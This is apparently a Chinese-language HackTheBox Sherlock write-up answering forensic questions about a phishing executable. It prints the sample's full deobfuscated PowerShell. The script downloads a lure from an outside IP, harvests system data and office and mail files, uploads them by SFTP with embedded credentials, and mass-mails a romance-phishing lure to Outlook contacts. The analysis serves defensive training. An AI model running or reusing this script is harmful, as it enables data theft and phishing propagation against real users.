HackTheBox Heartbreaker-Continuum
前言
揭开病毒分析的迷雾,回答官方提出的问题,了解这个病毒的工作原理。
背景
Following a recent report of a data breach at their company, the client submitted a potentially malicious executable file. The file originated from a link within a phishing email received by a victim user. Your objective is to analyze the binary to determine its functionality and possible consequences it may have on their network. By analyzing the functionality and potential consequences of this binary, you can gain valuable insights into the scope of the data breach and identify if it facilitated data exfiltration. Understanding the binary's capabilities will enable you to provide the client with a comprehensive report detailing the attack methodology, potential data at risk, and recommended mitigation steps.
Task 1
To accurately reference and identify the suspicious binary, please provide its SHA256 hash.
Virustotal 能获取很多关于这个病毒的信息。
Task 2
When was the binary file originally created, according to its metadata (UTC)?
Task 3
Examining the code size in a binary file can give indications about its functionality. Could you specify the byte size of the code in this binary?
Task 4
It appears that the binary may have undergone a file conversion process. Could you determine its original filename?
Task 5
Specify the hexadecimal offset where the obfuscated code of the identified original file begins in the binary.
这里通过 16 进制编辑器就能看到,现实的病毒可能需要各种逆向分析。
Task 6
The threat actor concealed the plaintext script within the binary. Can you provide the encoding method used for this obfuscation?
把代码提取出来,可以看到字符翻转、Base64、字符拼接的行为。问的是编码,那就是 Base64 了。
Task 7
What is the specific cmdlet utilized that was used to initiate file downloads?
还原上面的恶意代码
$hostname = $env:COMPUTERNAME
$currentUser = $env:USERNAME
$url = "http://44.206.187.144:9000/Superstar_MemberCard.tiff"
$img = "C:\users\$currentUser\Downloads\Superstar_MemberCard.tiff"
Invoke-WebRequest -Uri $url -OutFile $img
Start-Process $img
$searchDir = "C:\Users"
$targetDir = "C:\Users\Public\Public Files"
if (-not (Test-Path -Path $targetDir -PathType Container)) {
New-Item -ItemType Directory -Path $targetDir -Force | Out-Null
}
$currentUser | Out-File -FilePath (Join-Path $targetDir 'username.txt') -Force
nltest /dsgetdc:$env:USERDOMAIN 2>$null | Out-File -FilePath (Join-Path $targetDir 'DCinfo.txt') -Force
Get-WmiObject -Class Win32_UserAccount | Out-File -FilePath (Join-Path $targetDir 'localusers.txt') -Force
wmic /NAMESPACE:\\root\SecurityCenter2 PATH AntiVirusProduct GET /value 2>$null | Out-File -FilePath (Join-Path $targetDir 'AVinfo.txt') -Force
$currentUserProcesses = Get-WmiObject Win32_Process | Where-Object {
try {
$_.GetOwner().User -eq $currentUser
} catch {
$false
}
}
$currentUserProcesses | Select-Object ProcessName, ProcessId | Out-File -FilePath (Join-Path $targetDir 'UserProcesses.txt') -Force
if (Get-Process -Name Outlook -ErrorAction SilentlyContinue) {
Stop-Process -Name Outlook -Force -ErrorAction SilentlyContinue
}
$extList = "*.doc", "*.docx", "*.xls", "*.xlsx", "*.ppt", "*.pptx", "*.pdf", "*.csv", ".*oft", "*.potx",
"*.xltx", "*.dotx", "*.msg", "*.eml", "*.pst", "*.odt", "*.ods", "*.odp", "*.odg", "*.ost"
$null = Get-ChildItem $searchDir -Recurse -Include $extList -Force -ErrorAction 'SilentlyContinue' |
ForEach-Object {
$destinationPath = Join-Path $targetDir $_.Name
if ($_.FullName -ne $destinationPath) {
Copy-Item -Path $_.FullName -Destination $destinationPath -Force
}
}
Get-SmbShare | Out-File -FilePath (Join-Path $targetDir 'Shareinfo.txt') -Force
gpresult /r | Out-File -FilePath (Join-Path $targetDir 'GPinfo.txt') -Force
$ProgressPreference = 'SilentlyContinue'
$archivePath = "$targetDir\$hostname.zip"
Compress-Archive -Path $targetDir -DestinationPath $archivePath -Force
$wZipUrl = "https://us.softradar.com/static/products/winscp-portable/distr/0/winscp-portable_softradar-com.zip"
$wZipFile = "$targetDir\WinSCP.zip"
$wExtractPath = "C:\Users\Public\HelpDesk-Tools"
Invoke-WebRequest -UserAgent "Wget" -Uri $wZipUrl -OutFile $wZipFile -UseBasicParsing
Expand-Archive -Path $wZipFile -DestinationPath $wExtractPath -Force
$wExePath = "$wExtractPath\WinSCP.com"
$sPath = "$wExtractPath\maintenanceScript.txt"
@"
open sftp://service:M8&C!i6KkmGL1-#@35.169.66.138/ -hostkey=*
put `"$archivePath`"
close
exit
"@ | Out-File -FilePath $sPath -Force
Start-Process -FilePath $wExePath -ArgumentList "/script=`"$sPath`"" -Wait -NoNewWindow
$outlookPath = Get-ChildItem -Path "C:\Program Files\Microsoft Office" -Filter "OUTLOOK.EXE" -Recurse | Select-Object -First 1 -ExpandProperty FullName
$htmlBody = @"
<!DOCTYPE html>
<html>
<head>
<style>
body {
font-family: Calibri, sans-serif;
}
</style>
</head>
<body>
<p>Hey, </p> <p> Hope you're doing great when you see this. I'm reaching out because there's something I've been wanting to share with you. You know that feeling when you've been admiring someone from afar, but hesitated to take the next step? That's been me lately, but I've decided it's time to change that.</p>
<p>In a world where we often rush through everything, I believe in the beauty of taking things slow, cherishing each moment like a scene from a timeless tale. So, if you're open to it, I'd love for us to meet up after hours.</p>
<p>I've arranged for a rendezvous at a private membership club, where we can enjoy a bit of privacy and exclusivity. I've attached the map for your convenience. </p>
<p>To gain entry, you'll need a digital membership card for entry, accessible <a href='http://44.206.187.144:9000/Superstar_MemberCard.tiff.exe'>here</a>. Just a friendly heads up, there's a time limit before you can download it, so it's best to grab it sooner rather than waiting too long.</p>
<p>Counting on seeing you there later.</p>
</body>
</html>
"@
if ($outlookPath) {
Start-Process -FilePath $outlookPath
$outlook = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$contactsFolder = $namespace.GetDefaultFolder(10)
$csvFilePath = "$targetDir\Contacts.csv"
$contactsFolder.Items | ForEach-Object {
$_.GetInspector | ForEach-Object {
$_.Close(0)
}
$props = @{
'Full Name' = $_.FullName
'Email Address' = $_.Email1Address
}
New-Object PSObject -Property $props
} | Export-Csv -Path $csvFilePath -NoTypeInformation
$contacts = Import-Csv -Path $csvFilePath
$mailItem = $outlook.CreateItem(0)
$mailItem.Subject = "Fingers crossed you'll notice.."
$mailItem.HtmlBody = $htmlBody
$mailItem.Attachments.Add($img) > $null
$mailItem.BodyFormat = 2
foreach ($contact in $contacts) {
$bccRecipient = $mailItem.Recipients.Add($contact."Email Address")
$bccRecipient.Type = [Microsoft.Office.Interop.Outlook.OlMailRecipientType]::olBCC
}
$mailItem.Recipients.ResolveAll() > $null
$mailItem.Send()
}
Remove-Item -Path $wExtractPath -Recurse -Force
Remove-Item -Path $targetDir -Recurse -Force
可以看到
Invoke-WebRequest -Uri $url -OutFile $img
Task 8
Could you identify any possible network-related Indicators of Compromise (IoCs) after examining the code? Separate IPs by comma and in ascending order.
CyberChef 直接提取 IP
Task 9
The binary created a staging directory. Can you specify the location of this directory where the harvested files are stored?
阅读恶意代码可知
$targetDir = "C:\Users\Public\Public Files"
Task 10
What MITRE ID corresponds to the technique used by the malicious binary to autonomously gather data?
执行恶意代码的时候会自动收集用户的各种信息和文件。根据 https://attack.mitre.org/tactics/TA0009/ 可知是 T1119.
Task 11
What is the password utilized to exfiltrate the collected files through the file transfer program within the binary?
@"
open sftp://service:M8&C!i6KkmGL1-#@35.169.66.138/ -hostkey=*
put `"$archivePath`"
close
exit
"@
完结撒花
